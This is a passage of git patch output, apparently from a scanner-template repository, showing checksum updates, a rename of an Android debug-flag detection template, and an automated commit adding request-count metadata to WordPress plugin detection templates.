-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404 -http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4 -http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:3cee84059c9924bec0e4c4a42c30618ce4bcf6b6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6 -http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4 +http/technologies/wordpress/plugins/updraftplus.yaml:60fe37dcc4096c4f3780d83c361552fec4a0bccb +http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd +http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8 +http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233 +http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521 +http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265 +http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d4e216da24359b39cc1229c175f3645fb166139e +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee +http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba +http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d -http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee -http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c -http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457 -http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f -http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0 -http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c -http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20 -http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce -http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3 -http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b -http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b -http/technologies/wordpress/plugins/wp-smushit.yaml:aa13f78eb92d74a227a5cc3b4850c50f9e6d1825 -http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90 -http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624 -http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468 -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40 -http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39 +http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5 +http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074 +http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68 +http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2 +http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962 +http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded +http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8 +http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54 +http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5 +http/technologies/wordpress/plugins/wp-smushit.yaml:dfffaa485180a52888024c527a89ad9c74307aad +http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1 +http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f +http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -6501,7 +6501,7 @@ ssl/ssl-dns-names.yaml:aab93262d20a05bc780bf63d7c6d971611408d4e ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:7ab90033845c8fd761be452af7fb2a87dc5f7eec -templates-checksum.txt:194122dce87baac7e93f911eaa5fd3d8b303a5f0 +templates-checksum.txt:26c415e1e2a3a0c3610d9155bd361a7ab77c5f3a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 59925a8c4bb6fd3911f62be9aae6e1b57f7e6dec Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 6 Jul 2023 10:48:40 +0530 Subject: [PATCH 395/609] Update debug-enabled.yaml --- file/android/debug-enabled.yaml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/file/android/debug-enabled.yaml b/file/android/debug-enabled.yaml index 578959f1de..df8363e1b9 100644 --- a/file/android/debug-enabled.yaml +++ b/file/android/debug-enabled.yaml @@ -1,7 +1,7 @@ id: android-debug-enabled info: - name: Android Debug - Detect + name: Android Debug Enabled author: gaurang severity: low description: Android debug enabling was detected. @@ -15,5 +15,3 @@ file: - type: regex regex: - "android:debuggable=\"true\"" - -# Enhanced by md on 2023/05/03 From 405f78aeb3412d669113b154b068e1e68bd91185 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 6 Jul 2023 05:19:12 +0000 Subject: [PATCH 396/609] TemplateMan Update [Thu Jul 6 05:19:12 UTC 2023] :robot: --- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - 